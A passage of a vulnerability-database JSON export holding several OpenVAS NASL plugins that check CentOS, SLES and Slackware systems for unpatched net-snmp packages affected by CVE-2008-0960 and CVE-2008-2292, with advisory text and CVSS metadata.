NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"net-snmp\", rpm:\"net-snmp~5.1.2~11.el4_6.11.3\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"net-snmp-devel\", rpm:\"net-snmp-devel~5.1.2~11.el4_6.11.3\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"net-snmp-libs\", rpm:\"net-snmp-libs~5.1.2~11.el4_6.11.3\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"net-snmp-perl\", rpm:\"net-snmp-perl~5.1.2~11.el4_6.11.3\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"net-snmp-utils\", rpm:\"net-snmp-utils~5.1.2~11.el4_6.11.3\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:40:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2292", "CVE-2008-0960"], "description": "Check for the Version of net-snmp", "modified": "2018-04-06T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:1361412562310880234", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880234", "type": "openvas", "title": "CentOS Update for net-snmp CESA-2008:0529 centos3 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for net-snmp CESA-2008:0529 centos3 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Simple Network Management Protocol (SNMP) is a protocol used for\n network management.\n\n A flaw was found in the way Net-SNMP checked an SNMPv3 packet's Keyed-Hash\n Message Authentication Code (HMAC). An attacker could use this flaw to\n spoof an authenticated SNMPv3 packet. (CVE-2008-0960)\n \n A buffer overflow was found in the Perl bindings for Net-SNMP. This could\n be exploited if an attacker could convince an application using the\n Net-SNMP Perl module to connect to a malicious SNMP agent. (CVE-2008-2292)\n \n All users of net-snmp should upgrade to these updated packages, which\n contain backported patches to resolve these issues.\";\n\ntag_affected = \"net-snmp on CentOS 3\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-June/014970.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880234\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 08:40:14 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2008:0529\");\n script_cve_id(\"CVE-2008-2292\", \"CVE-2008-0960\");\n script_name( \"CentOS Update for net-snmp CESA-2008:0529 centos3 i386\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of net-snmp\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS3\")\n{\n\n if ((res = isrpmvuln(pkg:\"net-snmp\", rpm:\"net-snmp~5.0.9~2.30E.24\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"net-snmp-devel\", rpm:\"net-snmp-devel~5.0.9~2.30E.24\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"net-snmp-libs\", rpm:\"net-snmp-libs~5.0.9~2.30E.24\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"net-snmp-perl\", rpm:\"net-snmp-perl~5.0.9~2.30E.24\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"net-snmp-utils\", rpm:\"net-snmp-utils~5.0.9~2.30E.24\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2292", "CVE-2008-0960"], "description": "Check for the Version of net-snmp", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:880234", "href": "http://plugins.openvas.org/nasl.php?oid=880234", "type": "openvas", "title": "CentOS Update for net-snmp CESA-2008:0529 centos3 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for net-snmp CESA-2008:0529 centos3 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Simple Network Management Protocol (SNMP) is a protocol used for\n network management.\n\n A flaw was found in the way Net-SNMP checked an SNMPv3 packet's Keyed-Hash\n Message Authentication Code (HMAC). An attacker could use this flaw to\n spoof an authenticated SNMPv3 packet. (CVE-2008-0960)\n \n A buffer overflow was found in the Perl bindings for Net-SNMP. This could\n be exploited if an attacker could convince an application using the\n Net-SNMP Perl module to connect to a malicious SNMP agent. (CVE-2008-2292)\n \n All users of net-snmp should upgrade to these updated packages, which\n contain backported patches to resolve these issues.\";\n\ntag_affected = \"net-snmp on CentOS 3\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-June/014970.html\");\n script_id(880234);\n script_version(\"$Revision: 6651 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:45:21 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 08:40:14 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2008:0529\");\n script_cve_id(\"CVE-2008-2292\", \"CVE-2008-0960\");\n script_name( \"CentOS Update for net-snmp CESA-2008:0529 centos3 i386\");\n\n script_summary(\"Check for the Version of net-snmp\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS3\")\n{\n\n if ((res = isrpmvuln(pkg:\"net-snmp\", rpm:\"net-snmp~5.0.9~2.30E.24\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"net-snmp-devel\", rpm:\"net-snmp-devel~5.0.9~2.30E.24\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"net-snmp-libs\", rpm:\"net-snmp-libs~5.0.9~2.30E.24\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"net-snmp-perl\", rpm:\"net-snmp-perl~5.0.9~2.30E.24\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"net-snmp-utils\", rpm:\"net-snmp-utils~5.0.9~2.30E.24\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2292", "CVE-2008-0960"], "description": "Check for the Version of net-snmp", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:880243", "href": "http://plugins.openvas.org/nasl.php?oid=880243", "type": "openvas", "title": "CentOS Update for net-snmp CESA-2008:0529 centos4 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for net-snmp CESA-2008:0529 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Simple Network Management Protocol (SNMP) is a protocol used for\n network management.\n\n A flaw was found in the way Net-SNMP checked an SNMPv3 packet's Keyed-Hash\n Message Authentication Code (HMAC). An attacker could use this flaw to\n spoof an authenticated SNMPv3 packet. (CVE-2008-0960)\n \n A buffer overflow was found in the Perl bindings for Net-SNMP. This could\n be exploited if an attacker could convince an application using the\n Net-SNMP Perl module to connect to a malicious SNMP agent. (CVE-2008-2292)\n \n All users of net-snmp should upgrade to these updated packages, which\n contain backported patches to resolve these issues.\";\n\ntag_affected = \"net-snmp on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-June/015040.html\");\n script_id(880243);\n script_version(\"$Revision: 6651 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:45:21 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 08:40:14 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2008:0529\");\n script_cve_id(\"CVE-2008-2292\", \"CVE-2008-0960\");\n script_name( \"CentOS Update for net-snmp CESA-2008:0529 centos4 i386\");\n\n script_summary(\"Check for the Version of net-snmp\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"net-snmp\", rpm:\"net-snmp~5.1.2~11.el4_6.11.3\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"net-snmp-devel\", rpm:\"net-snmp-devel~5.1.2~11.el4_6.11.3\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"net-snmp-libs\", rpm:\"net-snmp-libs~5.1.2~11.el4_6.11.3\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"net-snmp-perl\", rpm:\"net-snmp-perl~5.1.2~11.el4_6.11.3\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"net-snmp-utils\", rpm:\"net-snmp-utils~5.1.2~11.el4_6.11.3\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:40:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2292", "CVE-2008-0960"], "description": "Check for the Version of net-snmp", "modified": "2018-04-06T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:1361412562310880145", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880145", "type": "openvas", "title": "CentOS Update for net-snmp CESA-2008:0529 centos3 x86_64", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for net-snmp CESA-2008:0529 centos3 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Simple Network Management Protocol (SNMP) is a protocol used for\n network management.\n\n A flaw was found in the way Net-SNMP checked an SNMPv3 packet's Keyed-Hash\n Message Authentication Code (HMAC). An attacker could use this flaw to\n spoof an authenticated SNMPv3 packet. (CVE-2008-0960)\n \n A buffer overflow was found in the Perl bindings for Net-SNMP. This could\n be exploited if an attacker could convince an application using the\n Net-SNMP Perl module to connect to a malicious SNMP agent. (CVE-2008-2292)\n \n All users of net-snmp should upgrade to these updated packages, which\n contain backported patches to resolve these issues.\";\n\ntag_affected = \"net-snmp on CentOS 3\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-June/014971.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880145\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 08:40:14 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2008:0529\");\n script_cve_id(\"CVE-2008-2292\", \"CVE-2008-0960\");\n script_name( \"CentOS Update for net-snmp CESA-2008:0529 centos3 x86_64\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of net-snmp\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS3\")\n{\n\n if ((res = isrpmvuln(pkg:\"net-snmp\", rpm:\"net-snmp~5.0.9~2.30E.24\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"net-snmp-devel\", rpm:\"net-snmp-devel~5.0.9~2.30E.24\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"net-snmp-libs\", rpm:\"net-snmp-libs~5.0.9~2.30E.24\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"net-snmp-perl\", rpm:\"net-snmp-perl~5.0.9~2.30E.24\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"net-snmp-utils\", rpm:\"net-snmp-utils~5.0.9~2.30E.24\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2292", "CVE-2008-0960"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n net-snmp\n net-snmp-devel\n perl-SNMP\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-13T00:00:00", "id": "OPENVAS:136141256231065905", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065905", "type": "openvas", "title": "SLES10: Security update for net-snmp", "sourceData": "#\n#VID slesp2-net-snmp-5422\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for net-snmp\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n net-snmp\n net-snmp-devel\n perl-SNMP\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65905\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2008-2292\", \"CVE-2008-0960\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES10: Security update for net-snmp\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"net-snmp\", rpm:\"net-snmp~5.3.0.1~25.26\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"net-snmp-devel\", rpm:\"net-snmp-devel~5.3.0.1~25.26\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"perl-SNMP\", rpm:\"perl-SNMP~5.3.0.1~25.26\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2292", "CVE-2008-0960"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2008-210-07.", "modified": "2017-07-07T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:61471", "href": "http://plugins.openvas.org/nasl.php?oid=61471", "type": "openvas", "title": "Slackware Advisory SSA:2008-210-07 net-snmp", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2008_210_07.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New net-snmp packages are available for Slackware 12.0, 12.1, and -current to\nfix security issues.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2008-210-07.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2008-210-07\";\n \nif(description)\n{\n script_id(61471);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2008-0960\", \"CVE-2008-2292\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2008-210-07 net-snmp \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"net-snmp\", ver:\"5.4.1.2-i486-1_slack12.0\", rls:\"SLK12.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"net-snmp\", ver:\"5.4.1.2-i486-1_slack12.1\", rls:\"SLK12.1\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:55:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2292", "CVE-2008-0960"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n net-snmp\n net-snmp-devel\n perl-SNMP\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5031860 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:65573", "href": "http://plugins.openvas.org/nasl.php?oid=65573", "type": "openvas", "title": "SLES9: Security update for net-snmp", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5031860.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for net-snmp\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n net-snmp\n net-snmp-devel\n perl-SNMP\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5031860 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65573);\n script_version(\"$Revision: 6666 